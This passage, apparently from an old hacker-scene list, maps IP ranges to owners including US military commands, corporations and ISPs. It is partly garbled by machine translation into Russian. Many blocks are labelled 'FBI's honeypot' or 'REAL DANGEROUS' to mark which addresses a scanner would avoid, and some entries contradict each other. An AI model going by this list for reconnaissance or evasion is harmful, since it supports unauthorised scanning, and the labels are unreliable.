завод Стейра&lt;br /&gt;160.132.0.0: Американская Команда Пополнения(Вербовки) Армии&lt;br /&gt;163.12.0.0: Морская Поставка Авиации Office&lt;br /&gt;164.59.0.0 - 164.60.0.0: Schering AG (NETBLK-TBLK-SCHERING)&lt;br /&gt;164.60.0.0: Schering AG (СЕТЬ-SCHERING2)&lt;br /&gt;164.61.0.0: Kaufhof Holding AG, Koeln&lt;br /&gt;164.224.0.0: Министр ВМС (NET-SECNAV-LAN)&lt;br /&gt;164.225.0.0: Армия США Сведения(Интеллект) и Команда Безопасности&lt;br /&gt;164.231.0.0: Военная Команда Sealift&lt;br /&gt;169.*.*.* неплатеж окон&lt;br /&gt;169.120.*.*: J. P. Morgan and Co (США)&lt;br /&gt;171.224.*.*: AOL Deutschland&lt;br /&gt;171.223.*.*:???&lt;br /&gt;172.16. [XS4ALL, Нидерланды&lt;br /&gt;172.128-180.*.*: Служба AOL, Inc.&lt;br /&gt;192.114.63.*: Netvision&lt;br /&gt;192.168. [частная сеть&lt;br /&gt;193.*.*.*: lahm&lt;br /&gt;193.79.178.*: UUNet&lt;br /&gt;193.101.100.*:Siemens&lt;br /&gt;193.122.199.*:SONNET (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;193.159.*.*: T-Online&lt;br /&gt;193.189.224.*: Siemens&lt;br /&gt;193.189.231.*: Siemens&lt;br /&gt;193.190.215.*:SONNET (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;194.8.193.*: Чистый Кельн&lt;br /&gt;194.8.197.*: Чистый Кельн&lt;br /&gt;194.31.232.*: Де-CIX&lt;br /&gt;194.90.0.*: Netvision&lt;br /&gt;194.100. * MBinternet, Финляндия&lt;br /&gt;194.121.59.*: Microsoft&lt;br /&gt;194.174.230.*:Siemens&lt;br /&gt;194.179.124.*:Microsoft&lt;br /&gt;194.203.122.*:UUNet&lt;br /&gt;194.230.*.*: PLUSNET AG (Schweitz)&lt;br /&gt;195.3.*.*: T-Online&lt;br /&gt;195.7.49.*: Siemens&lt;br /&gt;195.10.*: (honeypot ФБР)&lt;br /&gt;195.40.101.*: Siemens&lt;br /&gt;195.66. * Sonera, Нидерланды&lt;br /&gt;195.86. * Chello/Capacity, Нидерланды&lt;br /&gt;195.93.*.*: AOL Deutschland&lt;br /&gt;195.130. [Бандура, Бельгия&lt;br /&gt;195.186.*.*: Bluewin (Schweiz)&lt;br /&gt;195.238.160.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;195.238.164.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;195.238.163.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;195.238.174.*:SONNET (Flatrate) (МАЛЫШ(СУММА))&lt;br /&gt;199.31.0.0 - 199.31.255.0: американская Армейская Информационная Команда Систем&lt;br /&gt;199.203.4.*: Netvision&lt;br /&gt;199.203.230.*:Microsoft&lt;br /&gt;204.34.138.0 GSI (NET-GSI-13&lt;br /&gt;204.34.139.0 ШТАБ - КВАРТИРА, JFMO Корея, Штаб (NET-JFMO-KOREA)&lt;br /&gt;204.34.140.0 DISA D75 (СЕТЬ-TPOCNET)&lt;br /&gt;204.34.141.0 Американское Военно-морское Воздушное Средство(Ссуда), Atsugi Япония (СЕТЬ-NAFATSUGI01)&lt;br /&gt;204.34.142.0 Военно-морской Срочнослужащий Центр Управления Персонала (СЕТЬ-DMCCNHUB)&lt;/p&gt;
						&lt;p&gt;204.34.143.0 На плаву Обучающаяся Группа Tихий океан (СЕТЬ-ATGPAC)&lt;br /&gt;204.34.144.0 ШТАБ - КВАРТИРА Специальная Команда Операций(Действий) - Европа (ШТАБ - КВАРТИРА SOCEUR) (СЕТЬ-SCCIS)&lt;br /&gt;204.34.145.0 Морская база Командующего Перл-Харбор (СЕТЬ-CNBGW)&lt;br /&gt;204.34.147.0 Программа Усовершенствования Управления Информации NAVSEA (NET-TII-NET)&lt;br /&gt;204.34.148.0 Q112 (СЕТЬ-Q112) &lt;/p&gt;
						&lt;p&gt;204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures (NET-ASSIST-149) &lt;br /&gt;204.34.150.0 Resource Consultants, Inc. (NET-RCIADP) &lt;br /&gt;204.34.151.0 Personnel Support Activity, San Diego (NET-PSASD) &lt;br /&gt;204.34.152.0 NAVAL AIR FACILITY, ADAK (NET-LEVEL2ADAK) &lt;br /&gt;204.34.153.0 NAVSEA Logistics Command Detachment (NET-NSLC) &lt;br /&gt;204.34.154.0 PEARL HARBOR NAVAL SHIPYARD (NET-PHNSY-NET1) &lt;br /&gt;204.34.155.0 PEARL HARBOR NAVAL SHIPYARD (NET-PHNSY-NET2) &lt;br /&gt;204.34.156.0 Defense Photography School (NET-DPHSCH) &lt;br /&gt;204.34.157.0 - 204.34.160.0 Defense Information School (NETBLK-DINFOSNET1) &lt;br /&gt;204.34.161.0 Naval Air Systems Command (NET-PMA-222) &lt;br /&gt;204.34.162.0 Puget Sound Naval Shipyard (NET-PSNS-RMC) &lt;br /&gt;204.34.163.0 Joint Precision Strike Demonstration (NET-JPSD-EH) &lt;br /&gt;204.34.164.0 Naval Pacific Meteorology and Ocean (NET-NPMOCW-cool.gif &lt;br /&gt;204.34.165.0 Joint Precision Strike Demonstration (NET-JPSD-ES) &lt;br /&gt;204.34.167.0 USAF (NET-DMSHELPDESK) &lt;br /&gt;204.34.168.0 Commander (NET-THIRDNCB-LAN) &lt;br /&gt;204.34.169.0 Naval Air Warfare Center (NET-MSAICN) &lt;br /&gt;204.34.170.0 Naval Air Systems Command (NET-NADEP) &lt;br /&gt;204.34.171.0 NAVSTA SUPPLY DEPARTMENT (NET-GTMOSUPPLY) &lt;br /&gt;204.34.173.0 SUBMEPP Activity (NET-SUBMEPP-NET5) &lt;br /&gt;204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN (NET-SEVENFLEET) &lt;br /&gt;204.34.176.0 DISA-PAC,IPC-GUAM (NET-DIPCGU) &lt;br /&gt;204.34.177.0 Satellite Production Test Center (NET-SPTC-CS) &lt;br /&gt;204.34.181.0 940 Air Refueling Wing (ARW) (NET-ARW940-NET) &lt;br /&gt;204.34.182.0 Defense Megacenter Warner Robins (NET-WR) &lt;br /&gt;204.34.183.0 GCCS Support Facility (NET-GCCS-SUPPFAC) &lt;br /&gt;204.34.184.0 Nav Air Tech Serv Facility-Detachment (NET-NATSFDET-WNY) &lt;br /&gt;204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA (NET-NSFDG) &lt;br /&gt;204.34.186.0 Defense Logistics Agency - Europe (NET-EURNET2) &lt;br /&gt;204.34.187.0 NAVMASSO (NET-SNAP1-MATSGMERIDIAN) &lt;br /&gt;204.34.188.0 Commander-In-Chief, US Pacific Fleet (NET-CPF-LAN1) &lt;br /&gt;204.34.189.0 Defense MegaCenter - St Louis (NET-DMC-S-DFAS) &lt;br /&gt;204.34.190.0 NAVMASSO (NET-HMX1MCAFQUANVA-SNAP) &lt;br /&gt;204.34.192.0 HQ SOCEUR (NET-U-SIN) &lt;br /&gt;204.34.193.0 Second Marine Expeditionary Force (NET-U22-NIP) &lt;br /&gt;204.34.194.0 Second Marine Expeditionary Force (NET-U24-NIP) &lt;br /&gt;204.34.195.0 Second Marine Expeditionary Force (NET-U26-NIP) &lt;br /&gt;204.34.196.0 NAVCOMTELSTAWASHDC (NET-MISSI) &lt;br /&gt;204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER (ISTC) (NET-ISTC) &lt;br /&gt;204.34.198.0 Naval Observatory Detachment, Colorado (NET-FALCON1) &lt;br /&gt;204.34.199.0 NAVILCODETMECH (NET-NAVILCOMECH1) &lt;br /&gt;204.34.200.0 Navy Environmental Preventive Medicine (NET-NEHC-BURNED) &lt;br /&gt;204.34.201.0 Port Hueneme Division, Naval Surf (NET-PHDNSWC) &lt;br /&gt;204.34.202.0 Naval Facilities Engineering Housing (NET-NAVFAC) &lt;br /&gt;204.34.203.0 NAVSEA Logistics Command Detachment (NET-NSLC2) &lt;br /&gt;204.34.204.0 Naval Air Warfare Center (NET-OTT-NET) &lt;br /&gt;204.34.205.0 Portsmouth Naval Shipyard (NET-PORTSNET) &lt;br /&gt;204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER (ISTC) (NET-ISTCTC) &lt;br /&gt;204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific (NETBLK-NETBLK-USNSMERCY204) &lt;br /&gt;204.34.211.0 USAF Academy (NET-USAFA-GW-NET) &lt;br /&gt;204.34.212.0 3rd Combat Service Support (NET-CSSG3-NIP) &lt;br /&gt;204.34.213.0 1st Radio Battalion (NET-RDBN1-NIP) &lt;br /&gt;204.34.214.0 OASD (Health Affairs) (NET-TRICARE) &lt;br /&gt;204.34.215.0 Second Marine Expeditionary Force (NET-MEU26-SIP) &lt;br /&gt;204.34.216.0 1st Marine Air Wing (NET-ASE1-NIP) &lt;br /&gt;204.34.217.0 SA-ALC/LTE (NET-ITACNET) &lt;br /&gt;204.34.218.0 3rd Marine (NET-MAR3-NIP) &lt;br /&gt;204.34.219.0 Communications and Electronics (NET-MCBH-NIP) &lt;br /&gt;204.34.220.0 G-6 Operations, III MEF (NET-DFW5BR-NIP) &lt;br /&gt;204.34.221.0 G-6 Operations, III MEF (NET-DFW1-NIP) &lt;br /&gt;204.34.222.0 G-6 Operations, III MEF (NET-DFW2-NIP) &lt;br /&gt;204.34.223.0 G-6 Operations, III MEF (NET-DFW3-NIP) &lt;br /&gt;204.34.224.0 G-6 Operations, III MEF (NET-DFW4-NIP) &lt;br /&gt;204.34.225.0 Joint Interoperability Test Command (NET-JITC-RTD216.25.* &amp;lt;-- REAL DANGEROUS&lt;br /&gt;205.96-103.* :&lt;br /&gt;205.97.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.98.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.99.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.100.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.101.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.102.*.* : (FBI&#039;s honeypot) &lt;br /&gt;205.103.*.* : (FBI&#039;s honeypot) &lt;br /&gt;206.167. [Sherbrooke University, Canada &lt;br /&gt;207.30.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.31.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.32.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.33.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.34.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.35.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.36.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.37.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.38.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.39.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.40.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.41.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.42.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.43.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.44.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.45.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.46.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.47.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.48.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.49.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.50.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.51.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.52.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.53.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.54.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.55.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.56.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.57.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.58.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.59.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.60.*.* : (FBI&#039;s honeypot) The Internet Access Company (NETBLK-TIAC-BLK) &lt;br /&gt;207.61.*.* : FBI Linux servers used to trap scanners &lt;br /&gt;207.62.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.63.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.64.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.65.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.66.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.67.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.68.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.69.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.70.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.71.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.72.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.73.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.74.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.75.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.76.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.77.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.78.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.79.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.80.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.81.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.82.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.83.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.84.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.85.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.86.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.87.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.88.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.89.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.90.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.91.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.92.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.93.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.94.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.95.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.96.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.97.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.98.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.99.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.100.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.101.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.102.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.103.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.104.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.105.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.106.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.107.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.108.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.109.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.110.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.111.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.112.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.113.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.114.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.115.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.116.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.117.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.118.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.119.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.120.*.* : (FBI&#039;s honeypot) &lt;br /&gt;207.60.0.0 - 207.60.255.0 The Internet Access Company (NETBLK-TIAC-BLK) &lt;br /&gt;207.60.2.128 - 207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC) &lt;br /&gt;207.60.3.0 - 207.60.3.127 Mass Electric Construction Co. (NETBLK-TIAC-MECC56-2) &lt;br /&gt;207.60.3.128 - 207.60.3.255 Peabody Proberties Inc (NETBLK-TIAC-PEABISDN1) &lt;br /&gt;207.60.4.0 - 207.60.4.127 Northern Electronics (NETBLK-TIAC-NORTHERELEC) &lt;br /&gt;207.60.4.128 - 207.60.4.255 Posternak, Blankstein &amp;amp; Lund (NETBLK-TIAC-PBL56) &lt;br /&gt;207.60.5.64 - 207.60.5.127 Woodard &amp;amp; Curran (NETBLK-TIAC-WCPORT) &lt;br /&gt;207.60.5.192 - 207.60.5.255 On Line Services (NETBLK-TIAC-ONLINES-1) &lt;br /&gt;207.60.6.0 - 207.60.6.63 The 400 Group (NETBLK-TIAC-400T1) &lt;br /&gt;207.60.6.64 - 207.60.6.127 RD Hunter and Company (NETBLK-TIAC-RDHUNTER2) &lt;br /&gt;207.60.6.128 - 207.60.6.191 Louis Berger and Associates (NETBLK-TIAC-BERISDN) &lt;br /&gt;207.60.6.192 - 207.60.6.255 Ross-Simons (NETBLK-TIAC-ROSIMONS) &lt;br /&gt;207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank (NETBLK-TIAC-ECSB) &lt;br /&gt;207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee (NETBLK-TIAC-GLCAC12 &lt;br /&gt;207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc (NETBLK-TIAC-DEDI) &lt;br /&gt;207.60.8.0 - 207.60.8.255 Sippican (NETBLK-TIAC-SIPPICAN) &lt;br /&gt;207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co (NETBLK-TIAC-ALPISDN) &lt;br /&gt;207.60.9.32 - 207.60.9.63 Escher Group Ltd (NETBLK-TIAC-ESCHERT1-2) &lt;br /&gt;207.60.9.64 - 207.60.9.95 West Suburban Elder (NETBLK-TIAC-WESTISDN) &lt;br /&gt;207.60.9.96 - 207.60.9.127 Central Bank (NETBLK-TIAC-CENTRALT) &lt;br /&gt;207.60.9.128 - 207.60.9.159 Danick Systems (NETBLK-TIAC-DCS12 &lt;br /&gt;207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO (NETBLK-TIAC-ALPSISDN) &lt;br /&gt;207.60.9.192 - 207.60.9.223 BSCC (NETBLK-TIAC-BSCC) &lt;br /&gt;207.60.13.16 - 207.60.13.23 Patrons Insurance Group (NETBLK-TIAC-PATRON99) &lt;br /&gt;207.60.13.40 - 207.60.13.47 Athera Technologies (NETBLK-TIAC-ATHERA1) &lt;br /&gt;207.60.13.48 - 207.60.13.55 Service Edge Partners Inc (NETBLK-TIAC-SERVISDN-2) &lt;br /&gt;207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League (NETBLK-TIAC-MCUL384) &lt;br /&gt;207.60.13.64 - 207.60.13.71 SierraCom (NETBLK-TIAC-SIER384K) &lt;br /&gt;207.60.13.72 - 207.60.13.79 AI/ FOCS (NETBLK-TIAC-AIFOC384) &lt;br /&gt;207.60.13.80 - 207.60.13.87 Extreme soft (NETBLK-TIAC-DOWNIE) &lt;br /&gt;207.60.13.96 - 207.60.13.103 Eaton Seo Corp (NETBLK-TIAC-EATON) &lt;br /&gt;207.60.13.112 - 207.60.13.119 C. White (NETBLK-TIAC-PETROL) &lt;br /&gt;207.60.13.120 - 207.60.13.127 Athera (NETBLK-TIAC-ATHERA-2) &lt;br /&gt;207.60.13.128 - 207.60.13.135 Entropic Systems, INC (NETBLK-TIAC-ENTRO12 &lt;br /&gt;207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates (NETBLK-TIAC-WOOD56) &lt;br /&gt;207.60.13.160 - 207.60.13.167 Jamestown Distribution (NETBLK-TIAC-JAMES56) &lt;br /&gt;207.60.13.168 - 207.60.13.175 C&amp;amp;M Computers (NETBLK-TIAC-CRAMB-2 ) &lt;br /&gt;207.60.13.176 - 207.60.13.183 ABC Used Auto Parts (NETBLK-TIAC-ABC56K) &lt;br /&gt;207.60.13.184 - 207.60.13.191 Tomas Weldon (NETBLK-TIAC-TWELDON) &lt;br /&gt;207.60.13.192 - 207.60.13.199 Tage Inns (NETBLK-TIAC-TAGE) &lt;br /&gt;207.60.13.200 - 207.60.13.207 Control Module Inc (NETBLK-TIAC-CMOD56K) &lt;br /&gt;207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems (NETBLK-TIAC-HCRAWLER) &lt;br /&gt;207.60.13.216 - 207.60.13.223 Eastern Bearings (NETBLK-TIAC-EB56K) &lt;br /&gt;207.60.13.224 - 207.60.13.231 North Shore Data Services (NETBLK-TIAC-NSDS) &lt;br /&gt;207.60.13.232 - 207.60.13.239 Mas New Hampshire (NETBLK-TIAC-MASISDN) &lt;br /&gt;207.60.14.0 - 207.60.14.255 J. A. Webster (NETBLK-TIAC-JAWFRT1-2) &lt;br /&gt;207.60.15.0 - 207.60.15.127 Trilogic (NETBLK-TIAC-LOGIC384) &lt;br /&gt;207.60.16.0 - 207.60.16.255 Area 54 (NETBLK-TIAC-AREA54) &lt;br /&gt;207.60.18.0 - 207.60.18.63 Vested Development Inc (NETBLK-TIAC-VESTEDT-2) &lt;br /&gt;207.60.18.64 - 207.60.18.127 Conventures (NETBLK-TIAC-CON56-2) &lt;br /&gt;207.60.21.0 - 207.60.21.255 Don Law Company (NETBLK-TIAC-DONLAWT1-2) &lt;br /&gt;207.60.22.0 - 207.60.22.255 Advanced Microsensors (NETBLK-TIAC-AMS384) &lt;br /&gt;207.60.28.0 - 207.60.28.63 Applied Business Center (NETBLK-TIAC-APP56K-2) &lt;br /&gt;207.60.28.64 - 207.60.28.127 Color and Design Exchange (NETBLK-TIAC-COLOR-2) &lt;br /&gt;207.60.36.8 - 207.60.36.15 Shaun McCusker (NETBLK-TIAC-FINLAY) &lt;br /&gt;207.60.36.16 - 207.60.36.23 Town of Framingham (NETBLK-TIAC-INFOSERV) &lt;br /&gt;207.60.36.24 - 207.60.36.31 AB Software (NETBLK-TIAC-ABSADSL) &lt;br /&gt;207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc (NETBLK-TIAC-SEABASS) &lt;br /&gt;207.60.36.40 - 207.60.36.47 Next Ticketing (NETBLK-TIAC-NT256T1-2) &lt;br /&gt;207.60.36.48 - 207.60.36.55 Dulsi (NETBLK-TIAC-DULSI) &lt;br /&gt;207.60.36.56 - 207.60.36.63 The Internet Access Company (NETBLK-TIAC-PTIMJ) &lt;br /&gt;207.60.36.64 - 207.60.36.71 Maguire Group (NETBLK-TIAC-MAGISDN) &lt;br /&gt;207.60.36.72 - 207.60.36.79 Cogenex (NETBLK-TIAC-COGENEX-2) &lt;br /&gt;207.60.36.88 - 207.60.36.95 AKNDC (NETBLK-TIAC-AKNDC) &lt;br /&gt;207.60.36.96 - 207.60.36.103 McGovern election commitee (NETBLK-TIAC-MCGOVDED) &lt;br /&gt;207.60.36.104 - 207.60.36.111 Digital Equipment Corp (NETBLK-TIAC-DECISDN) &lt;br /&gt;207.60.36.112 - 207.60.36.119 PTR - Precision Technologies (NETBLK-TIAC-PTREB) &lt;br /&gt;207.60.36.120 - 207.60.36.127 Extech (NETBLK-TIAC-EXTECH-2) &lt;br /&gt;207.60.36.128 - 207.60.36.135 Manfreddi Architects (NETBLK-TIAC-MANELKUS-2) &lt;br /&gt;207.60.36.144 - 207.60.36.151 Parent Naffah (NETBLK-TIAC-PARENT) &lt;br /&gt;207.60.36.152 - 207.60.36.159 Darling Dolls Inc (NETBLK-TIAC-EMARTEL) &lt;br /&gt;207.60.36.160 - 207.60.36.167 Wright Communications (NETBLK-TIAC-WRIGHT56) &lt;br /&gt;207.60.36.168 - 207.60.36.175 Principle Software (NETBLK-TIAC-PRINCIPL) &lt;br /&gt;207.60.36.176 - 207.60.36.183 Chris Pet Store (NETBLK-TIAC-CPETDIAL) &lt;br /&gt;207.60.36.184 - 207.60.36.191 Fifteen Lilies (NETBLK-TIAC-GREYROSE) &lt;br /&gt;207.60.36.192 - 207.60.36.199 All-Com Technologies (NETBLK-TIAC-ALLCOM1-2) &lt;br /&gt;207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A. (NETBLK-TIAC-HEARTDOC) &lt;br /&gt;207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc (NETBLK-TIAC-PREFMFG-2) &lt;br /&gt;207.60.37.64 - 207.60.37.95 Apple and Eve Distributors (NETBLK-TIAC-AEDED99) &lt;br /&gt;207.60.37.96 - 207.60.37.127 Nelson Copy Supply (NETBLK-TIAC-NCOP56K) &lt;br /&gt;207.60.37.128 - 207.60.37.159 Boston Optical Fiber (NETBLK-TIAC-BOSISDN) &lt;br /&gt;207.60.37.192 - 207.60.37.223 Fantasia&amp;amp;Company (NETBLK-TIAC-FANTCOMP) &lt;br /&gt;207.60.41.0 - 207.60.41.255 Infoactive (NETBLK-TIAC-INFOACT-2) &lt;br /&gt;207.60.48.0 - 207.60.48.255 Curry College (NETBLK-TIAC-CURRY) &lt;br /&gt;207.60.62.32 - 207.60.62.63 Alternate Power Source (NETBLK-TIAC-APSIS) &lt;br /&gt;207.60.62.64 - 207.60.62.95 Keystone Howley-White (NETBLK-TIAC-KEYSTONE-2) &lt;br /&gt;207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD (NETBLK-TIAC-BRIDG384) &lt;br /&gt;207.60.62.160 - 207.60.62.191 County Supply (NETBLK-TIAC-CS384) &lt;br /&gt;207.60.62.192 - 207.60.62.223 NH Board of Nursing (NETBLK-TIAC-NHBNDED99) &lt;br /&gt;207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies (NETBLK-TIAC-LAUCHAM) &lt;br /&gt;207.60.64.64 - 207.60.64.127 Phytera (NETBLK-TIAC-PHYTERA1) &lt;br /&gt;207.60.66.0 - 207.60.66.15 The Network Connection (NETBLK-TIAC-TNC56) &lt;br /&gt;207.60.66.16 - 207.60.66.31 Young Refrigeration (NETBLK-TIAC-YRDED135) &lt;br /&gt;207.60.66.32 - 207.60.66.47 Vision Appraisal Technology (NETBLK-TIAC-VISIONT1) &lt;br /&gt;207.60.66.48 - 207.60.66.63 EffNet Inc (NETBLK-TIAC-EFFNETT1) &lt;br /&gt;207.60.66.64 - 207.60.66.79 Entropic Systems Inc (NETBLK-TIAC-ENTRO128-3) &lt;br /&gt;207.60.66.80 - 207.60.66.95 Finley Properties (NETBLK-TIAC-FPDED135) &lt;br /&gt;207.60.66.96 - 207.60.66.111 Nancy Plowman Associates (NETBLK-TIAC-NPAISDN) &lt;br /&gt;207.60.66.112 - 207.60.66.127 Northeast Financial Strategies (NETBLK-TIAC-NFSISDN) &lt;br /&gt;207.60.66.128 - 207.60.66.143 Textnology Corp (NETBLK-TIAC-TEXTC0RP) &lt;br /&gt;207.60.66.144 - 207.60.66.159 Groton Neochem LLC (NETBLK-TIAC-NEOCHEM) &lt;br /&gt;207.60.66.160 - 207.60.66.175 Tab Computers (NETBLK-TIAC-TCSI3) &lt;br /&gt;207.60.66.176 - 207.60.66.191 Patrons Insurance (NETBLK-TIAC-PATRON99-2) &lt;br /&gt;207.60.66.192 - 207.60.66.207 Chair City Web (NETBLK-TIAC-CHAIR56K) &lt;br /&gt;207.60.66.208 - 207.60.66.223 Radex, Inc. (NETBLK-TIAC-RADEXINC ) &lt;br /&gt;207.60.66.224 - 207.60.66.239 Robert Austein (NETBLK-TIAC-HACTRN) &lt;br /&gt;207.60.66.240 - 207.60.66.255 Hologic Inc. (NETBLK-TIAC-HOLOGIC3) &lt;br /&gt;207.60.71.64 - 207.60.71.127 K-Tech International Inc. (NETBLK-TIAC-KTECH) &lt;br /&gt;207.60.71.128 - 207.60.71.191 Pan Communications (NETBLK-TIAC-PANCOM-2) &lt;br /&gt;207.60.71.192 - 207.60.71.255 New England College of Finance (NETBLK-TIAC-NECF56K) &lt;br /&gt;207.60.75.128 - 207.60.75.255 Absolve Technology (NETBLK-TIAC-ABSOLVE-2) &lt;br /&gt;207.60.78.0 - 207.60.78.127 Extech (NETBLK-TIAC-EXTECH) &lt;br /&gt;207.60.78.128 - 207.60.78.255 The Insight Group (NETBLK-TIAC-MFIA) &lt;br /&gt;207.60.83.0 - 207.60.83.255 JLM Technologies (NETBLK-TIAC-JLMISDN) &lt;br /&gt;207.60.84.0 - 207.60.84.255 Strategic Solutions (NETBLK-TIAC-STRATSOL-2) &lt;br /&gt;207.60.94.0 - 207.60.94.15 McWorks (NETBLK-TIAC-MCWORKSS) &lt;br /&gt;207.60.94.32 - 207.60.94.47 Rooney RealEstate (NETBLK-TIAC-ROONEY56) &lt;br /&gt;207.60.94.48 - 207.60.94.63 Joseph Limo Service (NETBLK-TIAC-JOLIMO56) &lt;br /&gt;207.60.94.64 - 207.60.94.79 The Portico Group (NETBLK-TIAC-PORT56K) &lt;br /&gt;207.60.94.80 - 207.60.94.95 Event Travel Management Inc (NETBLK-TIAC-EVENT384) &lt;br /&gt;207.60.94.96 - 207.60.94.111 Intellitech International (NETBLK-TIAC-IIDED99) &lt;br /&gt;207.60.94.128 - 207.60.94.143 Orion Partners (NETBLK-TIAC-ORION56) &lt;br /&gt;207.60.94.144 - 207.60.94.159 Rainbow Software Solution (NETBLK-TIAC-RAIN99) &lt;br /&gt;207.60.94.160 - 207.60.94.175 Grason Stadler Inc (NETBLK-TIAC-GRASON56) &lt;br /&gt;207.60.94.192 